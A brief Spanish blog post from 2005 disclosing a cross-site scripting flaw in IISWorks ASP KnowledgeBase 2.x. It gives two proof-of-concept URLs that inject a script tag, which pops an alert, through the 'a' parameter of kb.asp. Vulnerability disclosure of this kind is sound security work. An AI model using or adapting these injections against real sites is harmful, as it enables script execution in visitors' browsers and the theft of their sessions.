ecoestadistica.com

martes, diciembre 06, 2005

IISWorks ASP KnowledgeBase 2.x XSS vuln.

Prueba de Concepto:

/kb.asp?a=%22%3E%3Cscript%3E
alert('Mouse')%3C/script%3E

/kb.asp?ID=210&a=%22%3E%3Cscript
%3Ealert('Mouse')%3C/script%3E

Salu2

ecoestadistica.com